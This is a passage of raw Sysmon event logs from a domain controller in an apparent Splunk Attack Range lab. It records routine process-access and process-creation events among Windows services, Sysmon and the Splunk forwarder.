ystem32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c 10341000x80000000000000001832Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.448{733EE690-3DF9-5F80-1000-000000007F01}11322112C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-3000-000000007F01}2456C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac 10341000x80000000000000001831Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.448{733EE690-3E09-5F80-3000-000000007F01}24563244C:\Windows\system32\DFSRs.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\DFSRs.exe+d839d|C:\Windows\system32\DFSRs.exe+c2ea|C:\Windows\system32\DFSRs.exe+50e1|C:\Windows\system32\DFSRs.exe+72d2|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001830Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.448{733EE690-3DF9-5F80-1000-000000007F01}11322112C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-3000-000000007F01}2456C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001829Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.448{733EE690-3DF9-5F80-1000-000000007F01}11322112C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-3000-000000007F01}2456C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029 10341000x80000000000000001828Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.432{733EE690-3DF9-5F80-1000-000000007F01}11322112C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-3000-000000007F01}2456C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac 10341000x80000000000000001827Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.432{733EE690-3DF9-5F80-1000-000000007F01}11322112C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-3000-000000007F01}2456C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c 10341000x80000000000000001826Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.432{733EE690-3DF9-5F80-1000-000000007F01}11322112C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-3000-000000007F01}2456C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+5a1b8|C:\Windows\system32\wbem\wmiprvsd.dll+35a49|C:\Windows\system32\wbem\wmiprvsd.dll+2807f|C:\Windows\system32\wbem\wmiprvsd.dll+29591|C:\Windows\system32\wbem\wmiprvsd.dll+292c2|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c 10341000x80000000000000001825Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.432{733EE690-3E09-5F80-3000-000000007F01}24563244C:\Windows\system32\DFSRs.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\DFSRs.exe+d839d|C:\Windows\system32\DFSRs.exe+c0dd|C:\Windows\system32\DFSRs.exe+50e1|C:\Windows\system32\DFSRs.exe+72d2|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001824Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.432{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0B-5F80-4900-000000007F01}2968C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001823Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.432{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001822Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.432{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001821Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.432{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001820Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.432{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001819Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.432{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001818Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.432{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001817Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.432{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001816Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.432{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001815Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.432{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E0B-5F80-4900-000000007F01}2968C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001814Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.432{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001813Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.432{733EE690-3E0B-5F80-4800-000000007F01}25322544C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{733EE690-3E0B-5F80-4900-000000007F01}2968C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001812Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.433{733EE690-3E0B-5F80-4900-000000007F01}2968C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{733EE690-3E0B-5F80-4800-000000007F01}2532C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 10341000x80000000000000001811Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.416{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0B-5F80-4800-000000007F01}2532C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001810Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.416{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001809Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.416{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001808Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.416{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001807Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 